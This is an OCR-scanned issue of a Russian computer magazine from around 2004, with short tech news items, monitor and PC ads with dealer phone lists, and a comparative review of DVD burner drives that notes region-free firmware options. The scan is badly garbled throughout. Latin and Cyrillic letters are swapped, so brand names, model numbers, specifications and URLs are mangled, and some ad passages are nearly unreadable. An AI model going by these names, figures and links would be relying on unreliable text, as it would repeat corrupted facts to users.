а Вес без аккумулятора: 145 г 

Рекомендованная производителем цена 
для АЗЗО составляет $200, для А340 - 
$250. ■ 



патчимся 

БЕЗ ПРОБЛЕМ 




М іеговой доконали 
жалобы на то, что 
юзеры страдают, ища 
нужные патчи на 
Місговой.сот. Действи- 
тельно, ѴѴіпсІоѵѵэ стал 
настолько дыряв, что 
прежде чем светить се- 
тевой адрес, необходи- 
мо поставить заплаток 
десять. Корпорация ре- 
шила выпустить специ- 
альный компакт-диск, 
содержащий все необхо- 
димые заплатки. Там бу- 
дет все: нужные сервис- 
паки, защита от брешей 
в ВРС, А5І4.1, кумуля- 
тивный патч для ІЕ 6.0 и 
многое другое. Приме- 
чательно, что болванка 
распространяется абсо- 
лютно бесплатно. Диск 
можно заказать на сайте 
М3 с 23 февраля. Люби- 
тели халявы - возрадуй- 
тесь! :) ■ 





ВЫБОР БУДУЩЕГО 



Абсолютно плоский 1 7" экран, 
идеальное соотношение 
цена/ качество 



1 7" ЖК монитор - совершенный дизайн, 
воплощение передовых технологий 



ТЕХНОТРЕЙД 

МОНИТОРЫ ИЗ ПЕРВЫХ РУК 



Дистрибуторская компания 

г. Москва, ул. Зоологическая, д. 26, стр. 2 
многоканальный телефон 970-1 3-83, факс 970-1 3-85 
Е-таіІ: 1есНпоігас1е@1есІіпо1гасІе.ги 



Акситек г. Москва (095) 737-3 1 75 
Аркис г. Москва (095) 785-3677, 785-3678 
Виртуальный киоск г. Москва (095) 234-3777 
ДЕНИКИН г. Москва (095) 787-4999 
Дилайн г. Москва (095) 969-2222 
ИНЛАЙН г. Москва (095) 941-6161 
КИТ Компьютер г. Москва (095) 777-6655 
М. Видео г. Москва (095) 777-7775 
НеоТорг г. Москва (095) 363-3825, 737-5937 
Никс г. Москва (095) 2 1 6-700 1 
Олди г. Москва (095) 284-0238 

Радиокомплект-Компьютер г. Москва (095) 953-5392, 953-5674 

Сетевая лаборатория г. Москва (095) 784-6490 

СтартІУІастер г. Москва (095) 967-1510 

Ф-Центр г. Москва (095) 472-6401, 205-3524 

СІТШѴІК г. Москва (095) 745-2999 

Оебіеп Сотриіегі г. Москва (095) 785-1080, 785-1077 

ЕІ5ІЕ г. Москва (095) 777-9779 

ЕІ.5Т г. Москва (095) 728-4060 

І5М г. Москва (095) 718-4020, 280-5144 

НТ - Роіагіб г. Москва (095) 970-1 930 

(ЛТКА Сотріііегб г. Москва (095) 729-5255, 729-5244 

1І5Ы Сотріііегб г. Москва (095) 775-8202 



АІ.ТЕХ г. Нижний Новгород (8312)1 66000, 657307 

Авиком г. Пермь (3422) 196158 

Алгоритм г. Казань (8432) 365272 

Аракул г. Нижневартовск (3466) 240920 

Арсенал г. Тюмень (3452) 464774 

ЗЕТНСКг. Новосибирск (3832) 125142, 125438 

Интант г. Томск (3822) 560056, 561616 

Клосс Компьютер г. Екатеринбург (3432) 659549, 657338 

Компания НИТ г. Биробиджан (42622) 66632 

КомпьюМаркет г. Саратов (8452) 241314, 269710 

Меморек г. Уфа (3472) 378877, 220989 

Мэйпл г. Барнаул (3852) 244557, 364575 

Никас-ЭВМ г. Челябинск (3512) 349402 

Окей Компьютер г. Краснодар (8612) 601 1 44, 602244 

Оргторг г. Киров (8332) 38 1 065 

Прагма г. Самара (8462) 701787 

Риан - Урал г. Челябинск (35 1 2) 33581 2 

Технополис г. Ростов на Дону (8632) 903 111, 903335 

Фирма ТЕСТ г. Саранск (8342) 240591 , 327726 

Экселент г. Мурманск (8152) 459634, 452757 
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И нтересный эксперимент 
провели китайские лю- 
бители экстремального раз- 
гона, оверклокнув процессор 
АІѴЮ АШоп 64 РХ53 аж до 
3007 МГц. Следует заметить, 
что верхний потолок частоты 
в этом эксперименте соста- 
вил 3083 МГц, однако, нес- 
мотря на хитроумную систе- 
му охлаждения, на этой час- 
тоте система работала не- 
достаточно стабильно, и 
овеклолкерам пришлось ус- 
тупить 76 мегагерц. 
Напряжение питания ядра 
в этот момент составляло 




1,76 В, системная шина 
работала на 228 мегагер- 
цах. В ходе эксперимента 
тактовая частота работы 
памяти РС3200 была дове- 
дена до экстремального 
значения - 466 МГц. 
Интерес представляет и сис- 
тема охлаждения. В подоб- 
ных опытах обычно применя- 
ют жидкий азот, температура 
кипения которого близка к 
абсолютному нулю. В нашем 
же случае оверклокеры ис- 
пользовали сухой лед, спирт 
(наверное, разбавляли во- 
дой :)) и медный радиатор 



большой тепловой емкости 
(они выбрали медь из-за ее 
хорошей теплопроводности 



при сравнительно большой 
теплоемкости). Ниже приве- 
дены характеристики систе- 



мы, над которой творили 
весь этот беспредел: 

А Системная плата: А5Ц5 5Ш с про- 
шивкой ВІ05 1004 и драйверами ЩогсеЗ 
л Память: два 513 Мб модуля Согзаіг 
00В400 ЗОВАМ на чипах ВПпОопб СН-5 
(тайминги - 6-2-3-2, напряжение питания 
- 27 В) 

А Видеокарта: на процессоре АН Вайеоп 
9800ХТ, драйвер -СаІаІузІ 3.1 (500/411) 
а Жесткий диск: два Махіог 5 АТА 
6У06ОМ0 ВАШ 0 

А блоки питания: НЕС 335» XI* С»Т 
550» XI 

А ОС: Жіпгіоѵге ХР Ргоіеввіопаі ЗР1 
а Система: открытая, температура ок- 
ружающей среды - 20 градусов ■ 



МПШПКЕ80ЕТ СМЕНИТ ИМЯ 




И звестному французскому 
поставщику МапбгакеЗой 
выдвинут судебный иск. Ком- 
пания обвиняется в незакон- 
ном присвоении названия. 



дело в том, что имя произош- 
ло от персонажа комиксов 
Мапбгаке ійе Мадісіап, кото- 
рому недавно исполнилось 
70 лет. Если поставщик изве- 



стного дистрибутива проиг- 
рает суд, то ему придется от- 
дать домен, название и зап- 
латить $70000 за моральный 
ущерб. Правда, пока идет су- 



дебный процесс, компания 
может пользоваться своим 
названием, я 



СПИЫЙ "БЕ30П0СНЫЙ" БРОУЗЕР 




К ак ни странно, Місгозой считает Іпіегпеі Ехріогег самым безопасным брау- 
зером. Несмотря на то, что за последний год для ІЕ было выпущено реко- 
рдное количество патчей, сотрудники М3 утверждают, что ослик в настоящее 
время является чуть ли не самым защищенным браузером среди всех конку- 
рентов. Недоразумение, возникающее после наложения последнего патча для 
осла (браузер перестает понимать символ @ в адресной строке), объясняется 
срочностью написания заплатки. Если бы сотрудники М3 с этим затянули, они 
понесли бы огромные убытки от использования бреши злоумышленниками. 
Британский сотрудник Місгозой не отрицает, что в браузере появятся и другие 
дырки, которые будут своевременно запатчены. Им бы только патчить ;). ■ 

музыкальный матрац 



НІТЕСН 



К омпания Ругатаі (ѵм.ругатаі.сот) представила музыкальный матрац. Ди- 
намики, сабвуфер и стереоусилитель на 50 Вт встроены в подголовник 
лежака. Теперь не нужно заботиться об изменении положения колонок и 
настройке баланса. Отдыхающему гарантированы интересная акустика и не- 
забываемые вибрации. В комплект спального места входит пульт дистанци- 
онного управления для регулировки громкости и уровня низких частот. Ис- 
точником сигнала может выступать плеер №/0, видеомагнитофон или игро- 
вая приставка. 
Одним движени- 
ем матрац прев- 
ращается в крес- 
ло. Новинка 
удобна в транс- 
портировке и 
продается в Се- 
ти по цене 150 
долларов, а 




КР0Ж0 ВЕКО 




М ісгозой всегда считала себя самой известной и защищенной фирмой. 

Вот и поплатилась. 13 февраля выяснилось, что все исходные коды 
ѴѴІп2000 и ѴѴІпИТ были украдены и выложены в интернете. Счастливчики ус- 
пели слить ценный варез весом 203 мегабайта (600 мегов в распакованном 
виде). Місгозой, в свою очередь, подтвердила, что лишилась исходников биб- 
лиотеки ѴѴІпЗоск, Оийоок и дырявого ослика ІЕ и тщетно пытается вернуть все 
назад. Корпорация угрожает судом всем обладателям и распространителям 
исходных кодов системы, призывая немедленно удалить сорцы. Утечка может 
стать роковой - продукты ОрепЗоигсе всегда славились своей уязвимостью. 
Поэтому все ждут появления новых эксплойтов и любимых червячков. ■ 
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ВЕПОКПТПМПРПН 



НІТЕСН 



И тальянская компания 5ВК 
Епдіпеегіпд 

ІІеЬікеиза.согп) выпустила комп- 
лект для быстрой трансформа- 
ции в катамаран обычного ве- 
лосипеда. На байк заранее 
монтируются специальные за- 
жимы. Присоединение осталь- 
ных элементов конструкции 
ЗИиШе-Віке осуществляется 
без инструментов. К заднему 
колесу велосипеда плотно 
прижат ролик, трос от которо- 
го идет к винту-рулю направ- 
ления, закрепляемому на пе- 
реднем колесе. Руль можно 
поворачивать на угол до 90 
градусов в каждую сторону, 
тем самым осуществляя раз- 
ворот практически на месте. 
Поплавки надуваются на берегу при помощи того же велосипеда - к валу 
приводного механизма подсоединяется насос. Сборка велокатамарана за- 
нимает 10 минут. Габариты агрегата в собранном виде - 240 на 130 сан- 
тиметров. Грузоподъемность - 130 кг. На воде велокатамаран развивает 
скорость до 10 км/ч. Набор весит 1 1 килограммов и легко транспортиру- 
ется в рюкзаке. Стоимость ЗИиПІе-Віке - около 1200 долларов. ■ 



СДЕПЯЙ СОИ: сводебный корпус 



НІТЕСН 




П осетитель форума НагсІГогит.сот сделал предложение руки и сердца в 
духе хай-тека. Увлеченный модингом, компьютерный романтик сделал 
апгрейд тачки и преподнес ее избраннице в свадебном корпусе. Через зас- 
текленное окошко в корпусе можно разглядеть фигурки молодоженов. Сис- 
темный блок украшен белоснежными лентами и цветами. Провода оберну- 
ты бусами. Сверху гик соорудил бутафорский свадебный пирог, на верхуш- 
ку которого водрузил кольцо. ■ 





Москва: ІЛ.ТКА: 775-7566 • ЦТ Сотриіег: 970-1930 • Рогсе Сотриіеге: 775-6655 ■ Ц5Ц Сотриіегз: 775-8202 • Сетевая лаборатория: 784-6490 ■ РОЬАКІЗ: 755-5557 ■ НИКС: 974-3333 ■ Ф- 
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Компьютер-Трэйд: (3852) 38-1000 • Екатеринбург: Трилайн: (3432) 78-7068 • Компания "ДСП": (3432) 78-7807 • Компьютеры без проблем: (3432) 50-6449 • СОМЗРЕС: (3432) 75-6268 • 
Иркутск: Комтек-Компьютерз: (3952) 59-7949 • Компания Билайн: (3952) 24-0024 • Казань: Александр ЛТД: (8432) 91-5915 • Кемерово: БАРС А: (3842) 28-4592 • Краснодар: Владос: 
(8612) 64-0464 • Компит: (8612) 67-9529 • Компьютерные системы: (8612) 60-1870 • Мурманск: Компания "Альфа": (8152) 44-1819 • Нижневартовск: Аракул: (3466) 63-4766 • Ланкорд: 
(3466) 61-2371 • Нижний Новгород: НЦКТ: (8312) 68-5994 • Новосибирск: НЭТА: (3832) 10-6500 • Нонолет: (3832) 39-6242 • ИЗ: (3832) 20-8070 • Диадема: (3832) 32-4063 • Омск: НТП 
ВТИ: (3812) 23-1703 • Оренбург: Галактика: (3532) 65-4056 • Ростов -на- Дону: Компьютерный Мир: (8632) 90-3111 • ДонТек: (8632) 95-0515 • Самара: КОСС+: (8462) 51-9600 • Санкт- 
Петербург: Компьютерная Служба 320-8080: (812) 320-80-70 • Саратов: НагсЛіпе: (8452) 22-3635 • Тольятти: Олвико: (8482) 22-9863 • Тула: Компьютер-Сервис: (0872) 31-2442 • 
Тюмень: Арсенал+: (3452) 46-4774 • Уфа: Компания КламаС: (3472) 52-0830 • Форте ВД: (3472) 35-0780 • Челябинск: Форт Электронике: (3512) 61-2987 еІІКАІ: (3512) 61-2341 • 
Череповец: Василёк: (8202) 21-55-81 • Южно-Сахалинск: • Визард Системе: (4242) 42-1771 

Служба клиентской поддержки (095) 777-2838 • Е-таіІ: $ирроі1@сіізІі.ги 
ОПТОВЫЕ ПОСТАВКИ: (095) 269-1776, 745-8466 • \ЛММШІ5ТІ.ВІІ 



ІМЕС/МІТ51ШІ5НІ 



МЕС-МІТЗЫВІЗНІ В.ЕСТТЮЫІС5 ОІЗРІАѴ 



Очевидное 

совершенство 



Мониторы 
с автоматической 
настройкой 



30" МЕС МиШЗупс® ЮЛ 3000 
40" МЕС МиШЗупс® ЮО 4000 

ЖК мониторы серии Ні-ЕпсІ 



МЕС МиШЗупс ЮО 1980зх+ 19" 
N60 МиШЗупс ЮО 2080их+ 20" 
МЕС МиШЗупс ЮО 2180их 21" 
Профессиональная серия 



ревосходное изображение 



Ітсутствие искажении 



МЕСАссиЗупс ЮО 71ѴМ17" 
Экономическая серия 



МЕС МиШЗупс ЮО1503М15” 
МЕС МиШЗупс ЮО 1703 М 17" 
МЕСАссиЗупс ІСО 91ѴМ19" 
Экономическая серия 



МЕС МиШЗупс І.СО1701 17’ 
Экономическая серия 



ильныи дизайн 



Іегкость в обращении 



Іеоспоримая надежность 



Іргономичность и безопасность 



ИЕС МиШЗупс РЕ770 17" 

РЕ990 19'7РЕ991 19" 

ЭЛТ мониторы бизнес серии 
ИЕС МиШЗупс РЕ2111 22" 

ЭЛТ монитор профессиональной серии 



МЕС МиШЗупс ЮО 1560ѵш 15" 
МЕС МиШЗупс ЮО 1760ѵт 17" 
Бизнес серия 



МЕС МиШЗупс ЮО1560 пх15" 
МЕС МиШЗупс ЮО 1760 пх17" 
МЕС МиШЗупс ЮО 1960 пхі 19" 
Бизнес серия 





П авно-давно, когда нас с тобой, приятепь, еще не было, умный дядька Нейман придуман счетную маши- 
ну - первый, можно сказать, компьютер, а позже его идеи воплотили в жизнь, собрав первое вычисли- 
тельное чудо. И все было здорово, вот только приходилось держать в голове кучу данных, и каждый раз 
нужно было вводить все заново... Продолжалось все до тех пор, пока кто-то не стащил идею перфолент из 
текстильной промышленности, и настало программерам счастье - информация могла автоматически записы- 
ваться и считываться на носитель. Но возрастали мощности ЭВМ, что впекло за собой увеличение объемов об- 
рабатываемой информации, и стали инженеры придумывать различные "хранилища" для нулей и единиц. Воз- 
никали разные идеи, но в итоге прижился способ с магнитной лентой, а значительным прорывом стало изобре- 
тение дискеты. И не возникало даже никаких вопросов - никто не смел оспаривать 3,5 дюйма пластика инфор- 
мационным объемом 1 ,44 Иб - это был стандарт де-факто. Следующим прорывом стало изобретение лазерно- 
го диска. Свалившиеся тогда на голову 65В Иб казались манной небесной, ведь количество хранимой инфор- 
мации возросло примерно в 500 раз. П с широким распространением СО-НПІІ] опять возник новый неофици- 
альный стандарт хранения данных. Просто всякие там магнитооптические и 2ІР носители не смогли вытеснить 
обычный СП, устройство чтения которого есть сейчас в каждом домашнем компьютере. Но вот на горизонте за- 
маячил новый стандарт - ВКВ, и если сначала это был видеодиск, то уже давно стало возможным хранение дан- 
ных на таком носителе. Однако на деле все оказалось не так просто... 



А ФОРИНТЫ 

На сегодняшний день существует 6 
практически несовместимых между 
собой форматов записи данных на 
"Универсальный Цифровой Диск": 
РѴР-ВАМ, РѴР-В(А), РѴР-В(С), РѴР- 
Щ РѴР+В, РѴР+ВѴ1/. У каждого из 
них есть свои преимущества и недос- 
татки, но главной проблемой остает- 
ся несовместимость форматов. И ес- 
ли большинство обычных РѴР-ВОМ 
плееров читают одновременно и 
"плюс" и "минус", то возможность 
чтения РѴР-ВАМ присутствуют дале- 
ко не у каждого драйва. Постепенно 
фильмы перебираются на диски РѴР, 
но вот о таком способе распростра- 
нения программ еще мало кто заду- 
мывается. Ведь, во-первых, объем 
носителя увеличился всего-то в четы- 
ре раза, да к тому же пути дальней- 
шего развития области оптических 
носителей никто пока предсказать не 
может - форматов слишком много. А 
если заглянуть в недалекое будущее, 
можно увидеть назревающую войну 



ВІие-Вау (или, по-русски, голубой ла- 
зер, который позволит записывать на 
болванку от 17 до 27 гигабайт на од- 
нослойный диск) с АОР5 (АбѵапсесІ 
ОріісаІ Різс Зузіет). 

Но мы все же рассматриваем 
РѴР-стандарт, поэтому попробуем 
сравнить между собой два формата, 
«+* и «-», поскольку они наиболее 
распространены. А РѴР-ВАМ не сто- 
ит брать в расчет из-за совершенной 
несовместимости (однако ради 
справедливости стоит сказать, что 
это самый надежный способ хране- 
ния данных). Вообще, особых отли- 
чительных черт нет, оба стандарта 
предоставляют схожие возможности 
по надежности и скорости записи. 
До недавнего времени у РѴР-ВШ 
имелась большая проблема с пере- 
записью (отсутствовала возмож- 
ность удалять І_еасІ-ОиІ, и, следова- 
тельно, каждая новая запись проис- 
ходила только через винчестер, с пе- 
реписыванием всех данных заново). 
Но этот недостаток уже неактуален, к 



(езІ ІаЬ выражает благодарность 
компании Сетевая Лаборатория 
(т. 500-03-05) за предоставленное 
для тестирования оборудование 



тому же разработана технология, 
позволяющая создавать мультисес- 
сии (Миііі-Вогсіег). К недостаткам 
РѴР+В(\А/) стоит отнести чуть мень- 
шую совместимость с бытовыми 
плеерами, однако это не говорит о 
несовершенстве формата, просто он 
появился позже. А если говорить о 
юзабельности, то на дисках 
РѴР+В(ѴѴ) стоит хранить данные 
(технологии Вапбот Ассезз и Моипі 
Ваіпіег тому способствуют), тогда 
как на РѴР-В(ѴѴ) фильмы. 

Появление биаі и гшііі дисководов 
вызвано той самой неопределен- 
ностью на рынке (пока сложно ска- 
зать, какой же все-таки формат луч- 
ше), и такое положение вещей явля- 
ется компромиссом в сложившейся 
ситуации. Но даже если производите- 



ли будут выпускать мульти-приводы, 
то болванки под них делать невыгод- 
но, так что в ближайшем будущем 
стоит ждать победы одного из фор- 
матов или их объединения. Но не 
стоит исключать и возможность выхо- 
да на арену новой силы, которая вы- 
теснит все текущие стандарты. 

А ТЕСТИРОВПНИЕ 

Перед проведением теста мы опре- 
деляли всяческие параметры приво- 
да с помощью программы Айеаб 
№го ІпІоТооІ (способность запи- 
си/чтения того или иного формата, 
размер буфера и зону ВРС). После 
чего программой Айеаб №го СР- 
РѴР Врееб строились графики рабо- 
ты привода в различных режимах. К 
сожалению, место в журнале ограни- 
чено, а нам хотелось бы максималь- 
но информативно рассказать тебе о 
том или ином девайсе, поэтому сре- 
ди большого количества графиков 
выбирался наиболее интересный. То 
есть если, допустим, на диаграмме 
записи ВѴѴ-диска видны отдельные 
мелкие зубчики (что можно списать 
на случайную ошибку - пылинка по- 
пала), а по чтению программа выда- 
ет идеально ровную линию, то мы 
оставляли график с чтением болван- 
ки. Или наоборот, все графики ров- 
ные, а на одном видны явные прова- 
лы (что никак не назовешь случай- 
ностью) - мы вставляли «важный». 
Все приводы имеют интерфейс 
подключения АТАРІ Шга РМА 33. 



А выводы 

Лучшим приводом стал МЕС N0- 
2500А, поскольку, по нашему мне- 
нию, он отвечает всем требованиям 
по скорости считывания и записи 
данных. Отличной покупкой будет 
КЗ (35А-4081В, который, ко всему 
прочему, может читать диски фор- 
мата РѴР-ВАМ. 









оно - война форинтов 



Р ИЕС N0 13000 



★ ★★★ 




З тот драйв посту- 
пил в ОЕМ-вари- 
анте. Внешний 
вид не отличается от 
модели 2500А фирмы 
ИЕС. Существует вари- 
ант с черной передней 
панелью. №го ІпІоТооІ 
сообщает, что привод 
многоформатный. К со- 
жалению, стоит отме- 
тить, что не удалось 
протестировать на за- 
пись-чтение РѴО-ВѴѴ 
из-за ошибок, вызываю- 
щих зависание компью- 
тера при записи в прог- 
рамме №го СО-ОѴО 
Зрееб. Скорей всего, 



это ошибка в прошивке, 
т.к. два имеющихся 
привода этой модели 
выдавали одинаковую 
ошибку. Однако запись 
в №го Вигпіпд РЮМ 
прошла успешно, после- 
дующий тест этой бол- 
ванки не выявил каких- 
либо проблем. При за- 
писи других форматов, 
в том числе и СР-ВѴѴ, 
привод показал себя от- 
менно. Изначально зона 
ВРС-2, но есть возмож- 
ность с помощью пе- 
репрошивки сделать 
драйв мультизонным 
(ВРС-1). 






ИЕС N0-25000 



★ ★★★★ 




П ривод поставляет- 
ся в ОЕМ-комп- 
лектации без ка- 
кой-либо инструкции. 

На передней панели 
присутствуют кнопка 
выброса, индикатор за- 
нятости, выход на науш- 
ники и регулятор гром- 
кости. Внешний вид до- 
вольно прост, есть вари- 
ант с черной передней 
панелью. Иего ІпТоТооІ 
выдает, что привод спо- 
собен работать с носи- 
телями РѴО-В/ВѴѴ и 
ОѴО+В/ПѴѴ. Примеча- 
тельно то, что он может 
записывать болванки 
ОѴР-В и ОѴРч-В на ско- 



рости 8х, а ОѴР-ВѴѴ и 
РѴОч-ВѴѴ на скорости 4х. 
В большинстве совре- 
менных моделей ско- 
рость записи ОѴЭ-ВѴѴ 
составляет 2х. 
№гоО\Ю5реес1 выдает 
ровные графики чтения 
и записи. Шум при ра- 
боте малозаметен, но 
присутствует небольшая 
вибрация. Привод изна- 
чально ВРС-1, но на 
сайте 

Іі11р://1огит.грс1.огд/(1І_аІІ.рІір 

сообщается, что заме- 
ной прошивки привод 
можно сделать мульти- 
зонным. 




ЖЕЛЕЗО 
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РІОЛЕЕВ Оив-ПОБЛ 









З та модель посту- 
пила в ВеіаіІ вари- 
анте. Внешне при- 
вод не отличатся от мо- 
дели РІСЖЕВ ОѴР-РМ/ 
0ѴВ-Ю60. И судя по 
№го ІпГоТооІ, это так и 
есть. Характеристики у 
них одинаковые. В 
комплекте диск с прог- 
раммами для записи, 
инструкция, две болван- 
ки ѴегЬаІіт ОѴР-В и 
ОѴР-ВѴѴ и аудиокабель. 
Сам драйв биаі-формат- 
ный и способен записы- 
вать все диски, кроме 
ОѴР-ВАМ. В тестах этот 
привод не отличался от 




модели ОѴВ-Ю6Р. Реко- 
мендовать его мы не 
станем потому, что поч- 
ти за такую же сумму 
можно взять более ско- 
ростной привод. Качест- 
во чтения-записи не вы- 
зывает никаких нарека- 
ний. Привод не мульти- 
зонный, но изначально 
регион не выбран. На 
сайте 

Шр:/Логшп.грс1.огд/(ІІ_аІІ.рІір 

есть информация о дос- 
тупности мультизонной 
прошивки. 



НІСОН МР5240 



★ ★★★★ 



П ривод поступил 
на тестирование 
в ОЕМ-комплек- 
тации. Внешний вид 
без излишеств. На пе- 
редней панели присут- 
ствуют только кнопка 
выброса лотка и инди- 
катор занятости. На 
лотке написаны под- 
держиваемые форматы 
и ^зШпк - фирменная 
технология Рісоіт, за- 
щищающая от опусто- 
шения буфера. С по- 
мощью программы 
Него ІпТоЕооІ выясняет- 
ся, что привод работает 
только с форматами 




Ші+П/т. В работе 
привод оказался до- 
вольно шумным. Отчет- 
ливо был слышен шум 
передвижения головки. 
Графики чтения-записи 
идеально ровные, без 
провалов и изломов. 
При работе привод 
ощутимо нагревался. 
Доступна прошивка с 
поддержкой мультизон- 
ности. 






Хотите получить 
больше времени 
для отдыха ? 





гарантии 2 гада 
КуПНО Я щ рСНыі 
Іаг ’Міпііф'ѵѵі ІР 
ипир»*в#н(і 

(ергнфт<і|нроп(тп РбіТеггом 
і отрацнбичу>№ нексу 6 -анке 
ірампыоіср пр индивидуальном, у шмшу («р предоплаты 



Приобретши ПК, который ПЫВОПнГ Вам 
обмениваться фотографиями с друзьями 
при работающей з фоновом режима 
программе антинируекпга сканирования - 
и на ои-іуіиатьѵ при этом эдмддпения 
работы Приобретите компьютер "МИР ѴіР" 
нэ Сазе профессора Іпіе*® Репіщгп® 4 
с технологией НТ ужо сегодня 




КДІЛЧПТІРМ 5-РГТСКЧИК* 
КОиппЕТТѴОіНЕ 



М Ір :!,'чи Л 1 нг. Г с епіег . г и 




€ 



салоны -магазины а Москве : 

■Ыврыик™’. ГЛ СЮ*** *Т* прі -Ш 
"гпнцл ІМ'.гаДІ - уп втулки», дг т<л: (ОД 
ИлВДшннй" АЛТіфьеКк*. _Л* 4 Г Е Щ И‘ (ПЯ| ЯЫИЗ 
ЧЕНГ БЫ Г .ІЗ чя та "Репин" тіг. іЖ ПЫ-Ш 

сервисный центр : 

"Бгіуичинм'.іт г ’с ОДНИМ? 
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81М0ВІІ-510П 



★ ★★★★ 






П ривод поступил в 
ВеіаіІ варианте. В 
комплекте сам при- 
вод, описание и инструк- 
ция по установке, набор 
крепежных винтиков, ключ 
для аварийного открытия 
лотка, шлейф ІЮМА 33, 
дополнительная сменная 
черная передняя панель с 
установочными элемента- 
ми, а также диск с прог- 
раммами для записи. Все 
запечатано в отдельные 
пакетики. Внешний вид 
отличается от стандартных 
приводов, особенно выде- 
ляется лоток для дисков, 
сделанный из матовой по- 
лупрозрачной пластмассы, 
покрытой сзади серебря- 



ной краской. С помощью 
сменной передней панели 
можно кардинально изме- 
нить внешний вид, это по- 
дойдет для черных корпу- 
сов. Сама панелька клас- 
сической формы без из- 
лишеств. Скоростные ха- 
рактеристики привода 
обычны. Можно отметить, 
что объем буфера 8 Мб, 
что гарантирует качест- 
венную запись. Шум при 
работе практически не 
слышен. Температура в 
пределах нормы. Чтение и 
запись любых болванок 
идеальны. Изначально 
привод ВРС-2, но есть 
возможность сделать его 
мультизонным. 





ХПРОКТЕРИСТИКИ 

Поддерживаемые форматы: бѴб+й®, ОѴб-й®, СО- 

Чтение: 32х(С0), 12»(РѴР) 

Запись РУР: 4«(-Д), 2х(-НД, 4х(*8). 4х(»М) 

Запись СР: 24х(В), 16х(ВИ) 

Среднее время доступа РѴР: 200 мс 
Среднее время доступа СР: 160 мс 
Объем буфера: 8 Мб 



ТЕПС0ІНѴ5Ѳ6 



★ ★★★★ 



П ривод поступил в 
ОЕМ-комплекгации. 
Сразу обращает на 
себя внимание меньшая 
длина привода по сравне- 
нию с другими. На перед- 
ней панели присутствуют 
кнопка выброса, индика- 
тор занятости красного, а 
не зеленого цвета, выход 
на наушники и регулятор 
громкости. В работе при- 
вод очень тихий. Лоток 
выезжает бесшумно. 
Программа Него ІпТоТооІ 
показывает, что привод 
дуалформатный и может 



работать с носителями 

отр-в/вѵѵ и м)+ в/гаѵ. 

Формат ОТО- ВАМ не под- 
держивается. При записи 
и чтении на носитель 
ОѴР+ВѴѴ график ровный, 
а при использовании но- 
сителей ОѴР-ВѴѴ график 
чтения в начале имеет 
пики, график записи ров- 
ный. При работе привод 
немного нагрелся. При 
необходимости можно 
сделать драйв мультизон- 
ным с помощью програм- 
мы ІіпВРС 

(Мір://(1Ііс014.грс1.огд/ІМРС). 



КПРПКТЕРИСТИКИ 

Поддерживаемые форматы: бѴб+В®, бѴО-В®, СО-В® 
Чтение: 40х(Сб), 12х(бѴб) 

Запись бѴб: 4х(-К), 2х(-В»), 8х(*Ю, 4х(*В«) 

Запись СР: 40х(В). 24х(КУ/) ~ 

Среднее время доступа ОѴб: 166 мс 
Среднее время доступа СО: 150 мс 
Объем буфера: 2 Мб 





и 680-4081 В 



★ ★★★★ 



К омплект коробоч- 
ной поставки Ей 
йЗА-4081 В включа- 
ет инструкцию, програм- 
мы, болванку ОѴР+В 4 х 
ТОК, а также шлейфы и 
винты. К сожалению, 
нельзя использовать ОѴР- 
ВАМ в картриджах. При 
работе слышен шум, а 
привод нагревается. Од- 
нако графики записи и 
чтения все ровные. Есть 
только небольшие прова- 
лы при записи/чтении 
ОТ)- ВАМ. Однако все эти 
недостатки несуществен- 



ны, поскольку Ей йЗА- 
4081 В - единственное в 
обзоре устройство, рабо- 
тающее со всеми распро- 
страненными ОТР-форма- 
тами (как на чтение, так и 
на запись). При этом не 
стоит забывать о высоких 
скоростных характеристи- 
ках и о необычном дизай- 
не. И все это за приемле- 
мую цену, конкурирую- 
щую с другими, менее 
функциональными диско- 
водами. В ОЕМ-комплек- 
тации Ей йЗА-4081 В мож- 
но найти за $140. 





• пѴісІіа ѲеРогсе РХ 5900 ІІІІга 




Передовая технология СіпеРХ™ 2.0 



256 Мб РйР! видеопамяти 



с 256-разряднои шинои данных 
и интерфейсом АСР 8Х 



Фирменная онлайн технология 



СатеРасе от А51ІЗ 



Поддержка ОігесіХ 9.0 и Ореп<31_ 1 .4 
Технология отображения 
информации на нескольких 
дисплеях пѴіеѵѵ 
Новейшие ЗР игры в 






комплекте 






Тел: (095) 974-32-10 



Тел: (095) 105-0700 
ѴѴеЬ: \ллллллоІсіі.ги 



ѴѵеЬ: пир://ѵѵѵѵѵѵ.рігі1.ги 



ііііит 



ни ЛІРІТЕШ 



Тел: (095) 729-5191 
ѴѴеЬ: ИМр://ѵѵѵ/ѵѵ.ос5.ги 



Тел: (095) 708-22-59 
Факс: (095) 708-20-94 



Тел: (095) 745-2999 
ѴѴеЬ: Шр://ѵѵѵѵѵѵ.сШІіпк.ги 



=~^ БЕЛЫЙ ветер 



Тел: (095) 269-1776 
ѴѴеЬ: ИПр://ѵѵѵѵѵѵ.с1і5Іі.ги 



Тел: (095) 799-5398 
ѴѴеЬ: Шр://ѵѵѵѵѵѵ.Іі2агс1.ги 





ЖЕЛЕЗО 
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П8Л8 0ВШ-0402Р 



0 5135 ОВѴѴ-0402Р - 
еще один дисковод 
с богатой комплек- 
тацией. Имеется станда- 
ртный набор: болванка 
Сй-В 52х, инструкция, 
шлейфы, винты и прог- 
раммы, такие как видеоп- 
леер АЗІЗЗТек АЗНЗОТЙ 
ХР. С этим дисководом 
вряд ли возникнут проб- 
лемы совместимости, 
ведь он читает и пишет 
почти все современные 
ОТЙ-форматы (ОТЙ-В/ВѴѴ 
и ОТЙ+В/В ѴѴ). Для борь- 
бы с перегревом на зад- 



ней стенке и передней 
панели устроены венти- 
ляционные отверстия. 
Значительное повышение 
температуры во время 
длительной работы - 
распространенный не- 
достаток многих конкури- 
рующих дисководов. Лю- 
бители комфорта оценят 
бесшумность чтения и 
записи А5135 ЙВѴѴ-0402Р. 
А для настоящих хакеров 
важна возможность мо- 
дернизации привода в 
ВРС-1 путем обычной за- 
мены микропрограммы. 








8ПМ8ІШС01Ш-МЩІ8КТ03В 



★ ★★ 



К ак всегда, компания 
Зашзипд не поску- 
пилась на винтики, 
шлейф, аудиокабель, 
ОТЙ-ВѴѴ и ОТЙ-ВАМ дис- 
ки, софт для записи и 
просмотра ОТЙ и 
инструкцию. Такова коро- 
бочная комплектация 
ЗАМБІЕЙ МЭ-МІЛЛ 
5ВТ03В. Понравилась 
нам и то, что на перед- 
ней панели есть регуля- 
тор громкости и гнездо 
наушников. ЗАМБІЕЙ 
ОТЙ-МЮ 5ВТ03В умеет 
записывать, кроме ОТЙ- 
В/ВѴѴ, еще и ОТй-ВАМ. 
Причем ВАМ может быть 



в картриджах. Чтение и 
запись происходят хоро- 
